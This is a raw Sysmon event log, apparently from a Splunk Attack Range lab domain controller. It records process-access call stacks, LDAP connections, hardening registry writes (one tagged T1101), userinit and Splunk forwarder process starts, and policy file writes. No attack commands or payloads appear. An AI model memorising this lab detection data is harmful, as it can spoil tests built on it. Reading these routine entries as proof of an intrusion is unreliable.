12:02:12.961{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004570Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.961{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 354300x80000000000000004569Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.720{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT 
AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-892.attackrange.local53570-false10.0.1.14win-dc-892.attackrange.local389ldap 354300x80000000000000004568Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.720{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53570-false10.0.1.14win-dc-892.attackrange.local389ldap 13241300x80000000000000004567Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:12.914{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\NTDS\Parameters\ldapserverintegrityDWORD (0x00000001) 13241300x80000000000000004566Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:12.914{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\Netlogon\Parameters\requiresignorsealDWORD (0x00000001) 13241300x80000000000000004565Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:12.914{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\LanmanServer\Parameters\requiresecuritysignatureDWORD (0x00000001) 13241300x80000000000000004564Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:12.914{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\LanmanServer\Parameters\enablesecuritysignatureDWORD (0x00000001) 13241300x80000000000000004563Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localT1101SetValue2021-03-31 12:02:12.914{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Control\Lsa\nolmhashDWORD (0x00000001) 
10341000x80000000000000004562Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.899{266CAFBE-64C4-6064-A100-00000000AE01}29803484C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004561Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.867{266CAFBE-646C-6064-1000-00000000AE01}11242368C:\Windows\system32\svchost.exe{266CAFBE-64C4-6064-A200-00000000AE01}3108C:\Windows\system32\userinit.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004560Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.867{266CAFBE-646C-6064-1000-00000000AE01}11241624C:\Windows\system32\svchost.exe{266CAFBE-64C4-6064-A200-00000000AE01}3108C:\Windows\system32\userinit.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x80000000000000004559Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.805{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000004558Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:12.743{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004557Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.743{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004556Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:12.743{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004555Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.743{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004554Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:12.743{266CAFBE-64C1-6064-9100-00000000AE01}51084328C:\Windows\system32\csrss.exe{266CAFBE-64C4-6064-A200-00000000AE01}3108C:\Windows\system32\userinit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000004553Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.743{266CAFBE-64C1-6064-9200-00000000AE01}2552876C:\Windows\system32\winlogon.exe{266CAFBE-64C4-6064-A200-00000000AE01}3108C:\Windows\system32\userinit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\winlogon.exe+15b13|C:\Windows\system32\winlogon.exe+ea76|C:\Windows\system32\winlogon.exe+b12f|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000004552Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.745{266CAFBE-64C4-6064-A200-00000000AE01}3108C:\Windows\System32\userinit.exe10.0.14393.0 (rs1_release.160715-1616)Userinit Logon ApplicationMicrosoft® Windows® Operating SystemMicrosoft CorporationUSERINIT.EXEC:\Windows\system32\userinit.exeC:\Windows\system32\ATTACKRANGE\Administrator{266CAFBE-64C3-6064-2804-0B0000000000}0xb04282HighMD5=C1B1FFC800BE2F31EB2CF8CB40629C69,SHA256=CFC6A18FC8FE7447ECD491345A32F0F10208F114B70A0E9D1CD72F6070D5B36F,IMPHASH=BFA137B16F3492AFCA0551687B067C04{266CAFBE-64C1-6064-9200-00000000AE01}2552C:\Windows\System32\winlogon.exewinlogon.exe 10341000x80000000000000004551Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:12.727{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004550Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.696{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{266CAFBE-64C4-6064-A100-00000000AE01}2980C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004549Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:12.696{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004548Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.696{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004547Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:12.696{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004546Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.696{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004545Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.696{266CAFBE-6469-6064-0500-00000000AE01}624740C:\Windows\system32\csrss.exe{266CAFBE-64C4-6064-A100-00000000AE01}2980C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000004544Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.696{266CAFBE-647D-6064-2F00-00000000AE01}27964104C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-64C4-6064-A100-00000000AE01}2980C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000004543Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.557{266CAFBE-64C4-6064-A100-00000000AE01}2980C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x80000000000000004542Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.713{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local53569-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local389ldap 354300x80000000000000004541Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.713{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local53569-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local389ldap 23542300x80000000000000004540Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.618{266CAFBE-646C-6064-1000-00000000AE01}1124NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Windows\security\templates\policies\tmpgptfl.infMD5=F443C7B00E42C58336E9113C4B92A1EA,SHA256=01406B7BD612A8321213382482E44EA2C7B5467B57E17E9C135EAB2A8221FAEA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000004539Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.618{266CAFBE-646C-6064-1000-00000000AE01}1124NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Windows\security\templates\policies\tmpgptfl.infMD5=26FFB2926F32F78EAEF80D8A870A88C6,SHA256=BA4E44773C9233D16C9950097A1D1FEF3AB2E8376120959E529DC97EF1871D7C,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000004538Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.618{266CAFBE-646C-6064-1000-00000000AE01}1124NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Windows\security\templates\policies\gpt00001.infMD5=DBBF697C05F302D06DD05403297DB608,SHA256=632CAD193E30E450B7753E6D16643B576DFABAA1FA60E8D29DA7665946810599,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000004537Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.603{266CAFBE-646C-6064-1000-00000000AE01}1124NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Windows\security\templates\policies\gpt00000.domMD5=338F5A9E4E606FC803055C8314E3F366,SHA256=DD15D6AD575AD10CBA979783EE68DC6A5A21ECDABDB4E0678F83870931BBD317,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000004536Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.572{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-6467-6064-0100-00000000AE01}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+2b3f4|C:\Windows\system32\lsasrv.dll+304a5|C:\Windows\system32\lsasrv.dll+2e33b|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+15e0d|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 
